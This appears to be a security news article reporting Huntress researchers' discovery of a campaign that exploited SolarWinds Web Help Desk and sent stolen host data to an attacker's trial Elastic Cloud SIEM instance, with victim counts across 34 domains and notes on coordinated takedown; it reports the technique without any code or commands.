A campaign exploiting multiple software vulnerabilities to steal system data and store it in a cloud-based security platform has been uncovered by cybersecurity researchers.
Investigators found that a threat actor used a free-trial instance of Elastic Cloud's security information and event management (SIEM) platform to collect and analyse data from compromised systems across dozens of organisations.
The activity was discovered by researchers at Huntress, who observed attackers exploiting flaws in widely used enterprise software, including SolarWinds Web Help Desk.
Instead of using traditional command-and-control (C2) infrastructure, the attacker exfiltrated victim data directly into an attacker-controlled instance of Elastic Cloud, effectively turning a legitimate security monitoring tool into a repository for stolen information.
Elastic Trial as Data Hub and VPN Infrastructure
According to the investigation, the attacker deployed an encoded PowerShell command on compromised systems that gathered detailed host information. The script collected operating system details, hardware specifications, Active Directory data and installed patch information before transmitting it to an ElasticSearch index named "systeminfo".
Researchers said the tactic allowed the operator to triage victims and prioritise targets using SIEM tools designed for defensive security monitoring.
The Elastic Cloud deployment was created on January 28, 2026, and remained active for several days. Telemetry showed the operator repeatedly interacting with the environment through the Kibana interface, logging hundreds of actions while examining incoming victim data.
Further analysis revealed that the trial account was registered using a disposable email address linked to the domain quieresmail.com. Investigators believe the address format is tied to the Russian-registered temporary email network firstmail.ltd, which operates hundreds of throwaway domains.
Additional evidence suggested the attacker reused random eight-character identifiers across their infrastructure, including both email registrations and subdomains used to host tooling on Cloudflare worker pages.
Administrative logins to the SIEM instance were traced to IP addresses believed to originate from a SAFING VPN privacy network tunnel.
Hundreds of Systems Affected
Data recovered from the attacker's Elastic environment indicated that the campaign affected at least 216 hosts across 34 Active Directory domains. The majority of compromised machines were servers, most commonly running Windows Server 2019 or 2022.
Victims appeared across numerous sectors, including:
-
Government organisations
-
Universities and educational institutions
-
Financial services companies
-
Manufacturing and automotive firms
-
IT service providers and retailers
Some hostnames suggested the attacker was also exploiting vulnerabilities in other enterprise platforms, including Microsoft SharePoint.
Researchers coordinated with Elastic and law enforcement to notify affected organizations and investigate the infrastructure. The cloud instance used in the campaign has since been taken offline.
"We have performed outreach and victim notification to organizations that we believe were indicated within the uncovered data, and we have coordinated with Elastic in a collaborative effort to further investigate and take down this threat actor infrastructure," Huntress said in its blog.